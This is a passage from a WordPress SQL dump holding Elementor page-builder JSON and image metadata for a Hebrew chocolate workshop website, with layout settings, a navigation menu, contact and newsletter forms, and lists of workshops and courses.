invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(291,75,'_elementor_template_type','page'),(292,75,'_elementor_edit_mode','builder'),(293,75,'_wp_page_template','default'),(294,75,'_elementor_data','[{\"id\":\"700950a2\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"20a86e96\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"62b3fe8e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f67ac3a\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"1abed8db\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"5569e669\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fcac0b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"25a68cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"c0d3ce2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8b16306\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da8bdfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"882928d\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9d026c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4058fdb2\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"778b3676\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"37eaf375\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61dc30dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"31a67108\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3bf2db\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"5122f9c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"63f9b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61739365\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"377296c9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"a673372\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"40017cec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23388368\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(295,73,'_elementor_version','0.4'),(296,76,'_wp_attached_file','2018/05/couple-chocho.jpg'),(297,76,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:630;s:4:\"file\";s:25:\"2018/05/couple-chocho.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"couple-chocho-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"couple-chocho-300x158.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"couple-chocho-768x403.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:403;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"couple-chocho-1024x538.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:538;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:25:\"couple-chocho-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(298,77,'_wp_page_template','elementor_canvas'),(299,77,'_elementor_edit_mode','builder'),(300,77,'_elementor_data','[{\"id\":\"700950a2\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"20a86e96\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"62b3fe8e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f67ac3a\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"1abed8db\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"5569e669\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\